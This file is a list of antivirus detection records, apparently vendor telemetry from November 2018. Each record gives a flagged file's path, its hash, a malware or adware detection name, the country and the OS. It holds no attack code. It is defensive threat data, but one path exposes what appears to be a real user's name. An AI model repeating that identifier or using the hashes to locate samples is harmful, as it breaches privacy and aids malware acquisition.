  Row(detection=Row(filename='avscan-20181104-204122-2153d193', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_21d84954\\AVSCAN-20181104-203904-1290D8EE\\AVSCAN-20181104-204122-2153D193', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:41:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T18:37:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.fseventsd.exe', filepath='D:\\.fseventsd.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8b8a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8b8a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T08:45:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085558-ffc8366b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-085558-FFC8366B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:56:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ybo.exe', filepath='c:\\users\\X\\appdata\\roaming\\ybo.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tunjangan operator sekolah.rar.exe', filepath='E:\\Lapor bulan\\data\\Arabic Pad 1.4\\BUKU AGAMA\\KLS 1\\cc\\Downloads\\TUNJANGAN OPERATOR SEKOLAH.rar.exe', filesize=1216000, name='ADWARE/MultiPlug.Gen4.#M300.#R300014'), hash='8a1a56a8088c8df6aeb899262dacef9f297706291bfe148bf6f6bb2ebd99c47d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T14:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename="paper_11 (deleted b'03d44e9a86b234a774b8cadbe2eb672f').htm", filepath="C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\.dropbox.cache\\2018-11-01\\paper_11 (deleted b'03d44e9a86b234a774b8cadbe2eb672f').htm", filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='c36f590833440b4f5d8942c8b3de81b098e11a9d408784ee672788f33379fe2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T08:32:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='euhjjvgk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\eUHjJvGk.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0078983.exe', filepath='D:\\System Volume Information\\_restore{74287D37-4381-464D-8D02-0FE8636E81A2}\\RP327\\A0078983.exe', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='98ddf9522f992afb449837013a3c724c6f757d8447a756ee6debcd264a796b1a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='464wqw3az.exe', filepath='\\?\\C:\\Program Files\\E8NHFAYPF0\\464WQW3AZ.exe', filesize=1088000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='caaa9dbbd9f4903b95dcdf3950a0a123bdb438e849495b7deaa8c08e32d2a1e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Documents\\Vuze Downloads\\Pixologic ZBrush 4R8 P2 + Crack (x64) - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-02T17:49:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130936-23d54bac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130457-03747F9B\\AVSCAN-20181102-130936-23D54BAC', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='\\\\?\\D:\\Lai xe 4-2017\\VB6\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='801aa52aeafe5ff6025090b7e1a21e03b036ad85c492878bd1b10b9a4c9839e3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-003121-de4138bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6eb2d0ae\\AVSCAN-20181102-001352-645D9F16\\AVSCAN-20181102-003121-DE4138BD', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100812-6557c794', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-100812-6557C794', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oceandn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\OCEANDN\\OCEANDN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecvfs5_01085.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECVFS5_01085.exe', filesize=428000, name='HEUR/APC.#M1.#R1'), hash='a0715f512395dc908b5be78ac756ca1350e64d4c0a9389a9866403a3c5115bd7', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163551-758e5efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e450412\\AVSCAN-20181102-163540-7356C6B3\\AVSCAN-20181102-163551-758E5EFE', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\82F026D9819428812A413F681F78D01F180017D6CC6F7040911A40FEEDDBCF69', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hihadafa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Saresof\\Hihadafa.exe', filesize=384000, name='HEUR/AGEN.1000007.#M1.#R1'), hash='7d291d989e1115abb2f4e708d7d4a5a206f74787ac089c95f0d5dff5f85f6397', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:36:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192312-aba02219', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8574edde\\AVSCAN-20181102-192132-A00211E6\\AVSCAN-20181102-192312-ABA02219', filesize=1024000, name='HEUR/AGEN.1003108.#M1.#R1'), hash='b4e1313652ba79e18df3fba67393810963fa3a4ea927aef0e5dcc85e03a414a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lzpk_0446297245.doc', filepath='G:\\GPArhiv\\LZPK_0446297245.doc', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='b1cb5003bebe829f78836ffefd09450abcb1947b28f2fdd110c745cca89cb66b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:33:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lhh5acsrxwr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:50:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsu8A19.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\Fotor3_3.4.1_163.15_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T08:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='\\\\?\\C:\\Program Files (x86)\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='f3bddeb44cd22f046cc90170314cc32cef997b98375d64aab286fcffe97f8feb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:38:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='98275ef9c1609078649215c1584d4b0e0b55a28255d494237ab02ba0e4edaf82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\98275EF9C1609078649215C1584D4B0E0B55A28255D494237AB02BA0E4EDAF82', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='98275ef9c1609078649215c1584d4b0e0b55a28255d494237ab02ba0e4edaf82', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:55:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_000b42', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000b42', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='d1fc19b40fe9f2c1af150665d199d902f6da88858235a225fb9059c19bd551c1', metadata=Row(cmdline='\\\\\\/recovered', country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T19:38:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1fljnoj43kq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-211412-529ad29c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00be33d7\\AVSCAN-20181101-211332-4C9C834D\\AVSCAN-20181101-211412-529AD29C', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beforeghost.exe', filepath='F:\\HBCD\\Programs\\BeforeGhost.exe', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274040003.pif', filepath='F:\\scan-peta-wb-sp2010\\3274040\\3274040003\\3274040003.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101215-a1133027', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d703463e\\AVSCAN-20181102-101158-9E1A648D\\AVSCAN-20181102-101215-A1133027', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nm1dy1c1phj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:40:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='killbox.exe', filepath="H:\\Hirens.BootCD.15.2\\Hiren's.BootCD.15.2\\HBCD\\Programs\\KillBox.exe", filesize=196000, name='W32/Ramnit.C.#M1.#R1'), hash='e0ce96af2847403ea4c68b2954486309f4544b81c02bcc738c98191fb6aacce4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=770648, timestamp='2018-11-02T17:35:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa.fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa', filepath='i:\\\xa0\\fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa.fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa', filesize=7616000, name='TR/Crypt.ZPACK.Gen7.#M300.#R604114'), hash='c31f7f577dfb7346855a64f5ecf3949acf4d4b8b9c9f3f714b2fb2815be8e7a0', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='fd302a53833fdc8e3fd3302f287b2aa646a4f5e42a3cbc42ff8f06029b9f42ba', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T22:19:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='07050b38-1064-4757-a89c-fb7383a998f7-2.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Apps Hat\\07050b38-1064-4757-a89c-fb7383a998f7-2.exe', filesize=900000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='db5c2a04813e3ff00413d86b105c2096437491ad313bffdb0bbcadc0323e2c20', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1a7.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1A7.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140629-203ebda0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140629-203EBDA0', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e0e2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e0e2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:56:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_windows-movie-maker (1).exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_windows-movie-maker (1).exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201518-8591fa35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201518-8591FA35', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114806-02d99c4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8231814a\\AVSCAN-20181104-112930-403F88DF\\AVSCAN-20181104-114806-02D99C4D', filesize=2112000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='f050ff3fee0b12748742d97310dbb48b0b2d9af3646631d8dd0c871105a0f785', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029195c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029195c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:55:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='start.exe', filepath='C:\\Program Files\\PS2\\DarkWatch\\Start.exe', filesize=384000, name='W32/Induc.blr.#M1.#R1'), hash='ff0d467e79f866ad5236fa5ab416d25d62a028d787cf5118243fc907f518e178', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:VNujmvK5kUeglBiv.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T04:13:42Z'), dt=datetime.date(2018, 11, 4)),
